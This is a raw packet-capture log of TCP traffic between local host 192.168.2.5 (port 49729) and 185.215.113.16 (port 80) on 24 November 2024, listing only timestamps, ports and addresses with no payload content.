                                                                                                                                                                                        Nov 24, 2024 02:13:27.446202993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.446202993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.446969986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.447082043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.447252035 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.447793007 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.447901964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.448632002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.448689938 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.448739052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.449536085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.449558973 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.449614048 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.449662924 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.450300932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.450409889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.450459003 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.451143026 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.451253891 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.451970100 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.452028990 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.452073097 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.452797890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.452855110 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.452898026 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.452943087 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.453660011 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.453773022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.453829050 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.454467058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.454579115 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.454634905 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.455302954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.455410004 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.455460072 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.456140041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.456244946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.456967115 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.457022905 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.457082033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.457814932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.457865953 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.457914114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.457978010 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.458713055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.458822966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.458873034 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.459479094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.459602118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.459656000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.460303068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.460423946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.461143970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.461203098 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.461249113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.461971998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.462055922 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.462078094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.462826014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.462881088 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.462927103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.462974072 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.463680983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.463927031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.463979959 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.464493990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.464610100 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.464663982 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.465317011 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.465430021 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.466152906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.466209888 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.466258049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.466993093 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.467046976 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.467089891 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.467137098 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.467798948 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.467926979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.467978001 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.468638897 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.468760967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.468810081 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.469494104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.469608068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.469660997 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.470309019 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.470431089 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.470479965 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.471151114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.471259117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.472028017 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.472081900 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.472130060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.472827911 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.472877026 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.472914934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.472960949 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.473670959 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.473781109 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.473840952 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.474512100 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.474622965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.474677086 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.475326061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.475435019 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.476161957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.476211071 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.476260900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.476996899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.477045059 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.477078915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.477128983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.477833986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.477955103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.478003979 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.478666067 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.478771925 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.478837013 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.479496002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.479608059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.479655981 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.480335951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.480458021 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.480508089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.481158018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.491159916 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.648037910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.648147106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.648225069 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.648452997 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.648562908 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.648617029 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.649358034 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.649490118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.649535894 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.650144100 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.650248051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.650989056 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.651042938 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.651076078 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.651249886 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.651835918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.651942015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.652292967 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.652637005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.652772903 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.652822971 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.653476954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.653585911 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.653634071 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.654323101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.654431105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.655148029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.655221939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.655250072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.655989885 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.656039953 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.656083107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.656131983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.656829119 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.656932116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.657306910 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.657660961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.657732964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.657782078 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.658489943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.658617020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.659251928 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.659327984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.659441948 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.660160065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.660218954 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.660263062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.660609007 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.660990953 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.661098957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.661875010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.661916971 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.661955118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.662652969 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.662703037 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.662744999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.663252115 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.663481951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.663620949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.663671970 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.664318085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.664434910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.664482117 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.665157080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.665268898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.666009903 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.666064024 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.666210890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.666853905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.666903019 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.666909933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.666955948 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.667695045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.667797089 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.667846918 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.668519020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.668625116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.668672085 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.669325113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.669459105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.669521093 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.670208931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.670300007 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.670351982 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.670988083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.671097994 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.671163082 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.671832085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.671946049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.671997070 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.672657967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.672780037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.672831059 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.673511982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.673621893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.674341917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.674402952 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.674446106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.675187111 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.675236940 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.675381899 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.675429106 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.676002979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.676119089 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.676167965 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.676843882 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.676948071 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.676995993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.677674055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.677783966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.678385019 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.678493977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.678628922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.678786039 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.679343939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.679471970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.680217981 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.680249929 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.680301905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.680386066 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.681019068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.681138039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.681854963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.681907892 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.681957960 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.682682991 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.682728052 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.682775974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.682821035 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.683573008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.683676958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.683943033 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.684356928 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.684470892 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.684521914 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.685173988 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.685292959 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.685913086 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.686008930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.686146975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.686358929 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.686911106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.687030077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.687077045 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.687689066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.687796116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.688016891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.688508987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.688615084 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.688708067 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.689346075 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.689460039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.689534903 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.690200090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.690305948 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.690365076 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.691011906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.691123962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.691178083 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:27.691796064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:27.744038105 CET4972980192.168.2.5185.215.113.16
